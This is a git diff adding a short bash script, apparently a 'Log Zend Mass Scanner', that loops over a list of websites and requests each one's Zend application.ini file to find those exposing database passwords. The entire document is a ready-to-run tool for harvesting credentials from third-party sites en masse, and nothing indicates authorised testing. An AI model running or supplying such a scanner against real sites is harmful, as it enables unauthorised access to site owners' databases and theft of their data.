diff --git a/Mass Find Logs/zend.sh b/Mass Find Logs/zend.sh new file mode 100644 index 0000000..8bfcc34 --- /dev/null +++ b/Mass Find Logs/zend.sh @@ -0,0 +1,19 @@ +#!/bin/bash +# Log Zend Mass Scanner +LISTS=$1 + +if [[ ! -f ${LISTS} ]]; then + echo "ERROR: ${LISTS} not found" + echo "usage: bash $0 list.txt" + exit +fi + +for SITE in $(cat $LISTS); +do + if [[ $(curl --connect-timeout 3 --max-time 3 -kLs "${SITE}/application/configs/application.ini" ) =~ 'resources.db.params.password' ]]; then + echo -e "\e[32m[+] FOUND: ${SITE}/application/configs/application.ini" + else + echo -e "\e[31m[-] NOT FOUND: ${SITE}" + fi + +done